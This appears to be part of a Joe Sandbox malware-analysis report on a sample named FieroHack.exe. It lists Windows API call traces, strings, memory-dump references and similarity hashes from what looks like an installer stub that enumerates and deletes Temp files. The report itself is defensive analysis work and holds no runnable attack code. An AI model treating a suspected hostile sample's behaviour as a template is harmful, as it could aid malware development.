                                                    • lstrcatA.KERNEL32(?,0042E3C0), ref: 00404780
                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                      • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                      • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                    • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                      • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                      • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                      • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: A
                                                    • API String ID: 2624150263-3554254475
                                                    • Opcode ID: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                    • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                    • Opcode Fuzzy Hash: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                    • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                    APIs
                                                    • DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                    • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                    • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                    • FindClose.KERNEL32(00000000), ref: 00405A26
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 004058BF
                                                    • \*.*, xrefs: 0040592A
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                    • API String ID: 2035342205-2759930460
                                                    • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                    • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                    • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                    • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                    APIs
                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming, xrefs: 00402230
                                                    Similarity
                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                    • String ID: C:\Users\user\AppData\Roaming
                                                    • API String ID: 123533781-159752144
                                                    • Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                    • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                    • Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                    • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(74DF3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                    • FindClose.KERNEL32(00000000), ref: 00406482
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                    • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                    • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                    • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                    • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                    • Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                    • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                    • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                    • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                    • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                    • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                    • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                    • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                    • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                    • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                    • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                    • DeleteObject.GDI32(00000110), ref: 00404C81
                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                    • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                    • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                    • ShowWindow.USER32(?,00000000), ref: 00405169
                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                    • ShowWindow.USER32(00000000), ref: 0040517B
                                                    Similarity
                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $M$N
                                                    • API String ID: 2564846305-813528018
                                                    • Opcode ID: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                    • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                    • Opcode Fuzzy Hash: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                    • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                    • ShowWindow.USER32(?), ref: 00403D00
                                                    • DestroyWindow.USER32 ref: 00403D14
                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                    • GetDlgItem.USER32(?,?), ref: 00403D51
                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                    • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                    • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                    • EnableWindow.USER32(?,?), ref: 00403F68
                                                    • EnableWindow.USER32(?,?), ref: 00403F83
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                    • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                    • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                    • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                    • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                    Similarity
                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                    • String ID:
                                                    • API String ID: 184305955-0
                                                    • Opcode ID: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                    • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                    • Opcode Fuzzy Hash: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                    • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                    APIs
                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                    • GetSysColor.USER32(?), ref: 004043B4
                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                    • lstrlenA.KERNEL32(?), ref: 004043D5
                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                    • SendMessageA.USER32(00000000), ref: 0040445E
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                    • SetCursor.USER32(00000000), ref: 004044E1
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                    • SetCursor.USER32(00000000), ref: 004044FA
                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                    • String ID: N
                                                    • API String ID: 3103080414-1130791706
                                                    • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                    • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                    • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                    • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                    APIs
                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                    • DrawTextA.USER32(00000000,0042EC20,000000FF,00000010,00000820), ref: 00401156
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                    • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                    • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                    • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                    • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                    • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                    • wsprintfA.USER32 ref: 00405DDB
                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                    • String ID: %s=%s$[Rename]
                                                    • API String ID: 2171350718-1727408572
                                                    • Opcode ID: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                    • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                    • Opcode Fuzzy Hash: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                    • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                    APIs
                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                    • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 0040640E
                                                    • *?|<>/":, xrefs: 0040641A
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 589700163-2176824615
                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                    • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                    • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                    APIs
                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                    • GetSysColor.USER32(00000000), ref: 0040423D
                                                    • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                    • SetBkMode.GDI32(?,?), ref: 00404255
                                                    • GetSysColor.USER32(?), ref: 00404268
                                                    • SetBkColor.GDI32(?,?), ref: 00404278
                                                    • DeleteObject.GDI32(?), ref: 00404292
                                                    • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                    • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                    • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                    • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                    • String ID:
